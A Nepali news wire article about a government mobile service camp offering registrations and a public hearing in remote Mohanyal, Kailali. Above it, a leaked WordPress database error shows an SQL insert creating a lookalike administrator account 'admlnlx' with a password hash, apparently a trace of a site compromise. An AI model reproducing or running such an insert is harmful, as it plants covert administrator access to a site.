WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BljzyzNVFIr1osMSPYWyepCwiUK5.k0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 07:32:57', '', 'admlnlx', 'admlnlx')
धनगढी,मंसिर २८ –
भौगोलिक विकटताका कारण सरकारी संयन्त्रका दृष्टिमा निकै टाढा कैलालीको मोहन्याल गाविसमा पहिलो पटक जिल्ला प्रशासन कार्यालयको पहलमा घुम्ती शिविर गरिएको छ ।
चुरे पहाड क्षेत्रमा पर्ने अति विकट मोहन्याल गाविसको कटुन्जेमा सोमबार र आज मङ्गलबार आयोजना गरिएको शिविरमा झन्डै ४०० स्थानीय बासिन्दालाई सेवा उपलब्ध गराइएको प्रजिअ गोविन्दप्रसाद रिजालले बताउनुभयो ।
प्रजिअ रिजाल, स्थानीय विकास अधिकारी केशवप्रसाद विमली, निर्वाचन कार्यालयका प्रमुखसहितको सरकारी कर्मचारीको टोलीले शिविरमा नागरिकता वितरण, मतदाता नामावली अध्यावधिक, जन्म दर्ता, विवाह दर्ता, मृत्यु दर्तालगायत सरकारी सेवा सुविधा प्रदान गरेको हो ।
सदरमुकामबाट झन्डै तीन घन्टा पैदल हिँडेर मोहन्यालको कटुन्जे पुगिन्छ । मोहन्याल गाविसमा अहिलेसम्म उचित सडक, सञ्चार, विद्युत्, खानेपानीलगायत आधारभूत सेवासुविधा समेत पुग्न सकेको छैन ।
यसैबीच प्रजिअ नेतृत्वको टोली र स्थानीय राजनीतिक दलका प्रतिनिधि तथा सर्वसाधारणको उपस्थितिमा सो क्षेत्रको विकास निर्माण र शान्ति सुरक्षाका विषयमा सार्वजनिक सुनुवाइ समेत भएको छ । – रासस